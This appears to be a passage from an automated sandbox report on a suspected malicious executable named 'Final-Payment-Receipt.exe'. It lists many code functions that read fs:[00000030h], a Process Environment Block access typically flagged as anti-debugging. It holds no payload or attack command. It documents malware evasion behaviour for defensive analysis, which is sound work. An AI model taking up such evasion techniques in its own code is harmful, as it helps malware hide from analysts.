          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01433884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01433884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01485BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E53C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01444257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F5A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F5A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F5A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01433540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01463D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0143A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01488D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0147E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01468DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_014805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_014805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0144C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0144C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
